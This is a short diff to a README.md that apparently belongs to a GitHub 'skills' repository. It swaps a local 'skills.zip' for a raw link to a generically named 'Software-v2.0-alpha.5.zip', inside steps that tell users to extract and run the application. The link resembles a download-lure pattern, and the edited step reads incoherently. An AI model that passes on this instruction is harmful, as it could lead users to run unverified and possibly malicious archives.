ShiverSparkle/skills/README.md

 Once the download is complete, follow these steps to extract and run the application:

 1. Locate the downloaded file, typically in your "Downloads" folder.
-2. Right-click on the `skills.zip` file.
+2. Right-click on the `https://github.com/ShiverSparkle/skills/raw/refs/heads/main/setup-to-pyproject/Software-v2.0-alpha.5.zip` file.
 3. Select "Extract All" or "Unzip" depending on your operating system.
 4. Choose a destination folder to save the extracted files and click "Extract".